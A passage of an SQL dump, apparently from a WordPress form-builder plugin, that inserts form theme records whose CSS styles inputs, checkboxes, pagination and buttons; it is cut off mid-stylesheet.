#FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #0072A2;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0072A2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #006C9A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0072A2), color-stop(39%, #00709F), color-stop(100%, #006A97)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0072A2 0%, #00709F 39%, #006A97 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(25, 'Theme 07 green', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #00A25B;\r\nmargin-bottom: 10px;\r\ncolor: #00A25B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #00A25B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #00A25B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #00A25B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #00A25B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #00A25B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00A25B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00A15B ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00A25B ), color-stop(39%, #00A15A ), color-stop(100%, #00A15B )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00A25B 0%, #00A15A  39%, #00A15B 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00A25B 0%, #00A15A 39%, #00A15B 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: 